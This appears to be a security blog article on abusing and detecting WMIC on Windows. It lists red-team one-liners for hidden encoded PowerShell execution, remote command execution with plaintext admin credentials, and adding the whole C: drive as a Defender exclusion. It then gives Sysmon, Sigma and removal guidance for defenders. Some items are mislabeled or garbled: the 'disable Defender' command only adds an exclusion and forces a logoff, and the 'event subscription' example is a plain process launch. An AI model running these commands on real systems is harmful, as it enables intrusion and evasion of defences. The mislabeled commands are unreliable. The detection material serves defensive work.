Build Your Own Cloud LOLBin Scanner: A Python Script for Detecting Risky CLI Commands
WMIC: The Forgotten Windows Admin Tool That Still Haunts Red Teams and Blue Teams in 2025
Understanding Windows Management Instrumentation Command-line (WMIC) and Why It Refuses to Die in Modern Cybersecurity
WMIC is deprecated but not dead. Attackers still love it because it's native, signed by Microsoft, rarely blocked, and can do almost anything WMI can do—quietly. Defenders hate it for exactly the same reasons.
What is WMIC, Really?
WMIC (Windows Management Instrumentation Command-line) is a command-line interface to WMI (Windows Management Instrumentation) that shipped with every Windows version from XP to Windows 11 24H2 (and Server 2025).
Even though Microsoft officially deprecated WMIC in Windows 10 1709 (2017) and started showing the “deprecated” banner, the binary (wmic.exe) is still present and fully functional in 2025 on all supported Windows versions unless manually removed.
It's a classic Living-Off-the-Land Binary (LOLBin).
Why Attackers Still Love WMIC in 2025
- 100% native, Microsoft-signed → evades most application allowlisting (AppLocker, WDAC)
- Can execute commands remotely (with creds)
- Can query almost anything on a Windows system
- Leaves very little forensic evidence compared to PowerShell
- Often excluded from EDR telemetry collection rules (legacy exemptions)
Common Red Team One-Liners (2025 Edition)
1 Basic Local Process Execution (No PowerShell)
wmic process call create "calc.exe"
wmic process call create "powershell.exe -nop -w hidden -enc <base64>"2 Remote Code Execution (with domain/admin creds)
wmic /node:"192.168.10.50" /user:"DOMAIN\admin" /password:"P@ssw0rd!" process call create "cmd.exe /c whoami > C:\temp\pwned.txt"3 Stealthy Lateral Movement via WMI Event Subscription (Persistence + Execution)
wmic /node:"TARGET01" /user:"DOMAIN\attacker" /password:"Secret123!" process call create "cmd /c powershell -enc <long-payload>"4 Enumerate Local Administrators (Great for privilege auditing or hunting)
wmic path win32_groupuser where (GroupComponent="Win32_Group.Name=\"Administrators\"") | findstr /i "Administrator"5 List Running Processes (Stealthier than tasklist in some EDRs)
wmic process get name,processid,commandline /format:list6 Quietly Disable Windows Defender Real-Time Monitoring (needs admin)
wmic /namespace:\\root\microsoft\windows\defender path MSFT_MpPreference call Add ExclusionPath="C:\" & wmic path Win32_OperatingSystem call Win32Shutdown 47 Pull BIOS Serial + UUID (Useful for asset tagging or loot)
wmic bios get serialnumber
wmic csproduct get uuidDetection & Hunting Tips (Blue Team Side)
| Technique | Detection Method |
|---|---|
| WMIC process creation | Sysmon Event ID 1 with Image = wmic.exe and CommandLine contains process call create |
| Suspicious parent-child | Parent = cmd.exe → Child = wmic.exe → Grandchild = powershell.exe or cmd.exe |
| Remote WMIC execution | Event ID 5145 (Network Share Access) + object name contains ROOT\CIMV2 or Event 5859 (WMI activity) |
| Legacy telemetry gaps | Many EDRs still exclude wmic.exe from script block logging → enable CommandLine auditing (GPO: Advanced Audit Policy → Detailed Tracking → Process Creation) |
Sigma Rule Example (Detect WMIC process creation abuse)
title: WMIC Process Creation Abuse
id: 764d100e-b334-4e1e-9c44-1b23f8616f21
detection:
selection:
Image: '*\\wmic.exe'
CommandLine|contains: 'process call create'
condition: selection
falsepositives:
- Legitimate admin scripts (rare in 2025)
level: highHow to Kill WMIC in Your Environment (If You Dare)
# Option 1: Delete the binary (breaks nothing in 2025)
takeown /f C:\Windows\System32\wbem\wmic.exe
icacls C:\Windows\System32\wbem\wmic.exe /deny Everyone:(X)
del /f /q C:\Windows\System32\wbem\wmic.exe
del /f /q C:\Windows\SysWOW64\wbem\wmic.exe
# Option 2: AppLocker / WDAC rule
# Block executable: %SYSTEM32%\wbem\wmic.exe and %SYSWOW64%\wbem\wmic.exeNote: PowerShell's Get-WmiObject / Invoke-WmiMethod were removed in PowerShell 7+. WMIC is one of the last built-in ways to abuse WMI from cmd.exe.
Final Verdict in 2025
WMIC is the cockroach of Windows LOLBins: deprecated, hated, but still crawling around corporate environments.
Red teams keep it in their back pocket because it still works everywhere.
Blue teams should treat any wmic process call create as malicious until proven otherwise.
Stay frosty.